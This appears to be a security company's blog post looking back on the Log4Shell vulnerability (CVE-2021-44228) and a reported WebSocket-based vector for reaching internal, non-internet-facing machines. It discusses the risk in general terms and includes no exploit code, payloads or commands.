Infiltrating Internal Networks with Log4Shell
Now that the year is at its last days, we can retrospectively examine the most significant disruption that occurred in 2021. Slowly we begin to grasp the scope of events that followed the discovery of CVE-2021-44228, also known as ‘Log4Shell’, and its impact on the information security world.
While security teams worked over the clock to protect their servers from the vulnerability, they overlooked a more sophisticated Log4Shell attack vector. One that enables hackers to reach into their victim’s internal environments.
Read more on the bing domain vulnerability.
Exploiting Log4Shell vulnerability via WebSockets
Since the discovery, many security researchers have delved into deeper learning on this vulnerability to exploit its volatile potential. In a report by Blumira’s CTO, Matthew Warner, he presented a vulnerability they found by triggering it using a WebSocket connection to machines with Log4J libraries. This is critical because it enables attacks on local services. In simple words, hackers utilize the vulnerability to attack devices disconnected from the internet!
“Until now, everybody looked for Log4Shell vulnerability on external servers open to the world. Now, hackers can even attack internal machines that you didn’t think can be breached,” says Ysrael Gurt, Reflectiz CTO. “This vector significantly expands the attack surface and can impact services running using VPN or ones that are connected to the local network.”
Read more on WebSockets and portscanning.
Why Websocket increases the attack surface
The real game-changer in the latest discovery proves that by utilizing WebSocket communication for the Log4J vulnerability exploit. This opens an entirely new attack vector that uses a digital supply chain and Java tools to attack previously unreachable machines through a compromised server. Since WebSocket is a network request that runs on the client-side, every service accessing the user machine will be targeted by the WebSocket request.
Read more on similar discoveries in CDNjs RCE.
We already knew how dangerous the extensive use of Log4J libraries across various devices is. However, this discovery proves that threat actors can evaluate Log4Shell vulnerability into large-scale supply chain attacks.
The Log4Shell saga is an ongoing event. It’s an event of which we are yet to see the full scope of its impact. It reminds us that there’s always a new vulnerability to exploit.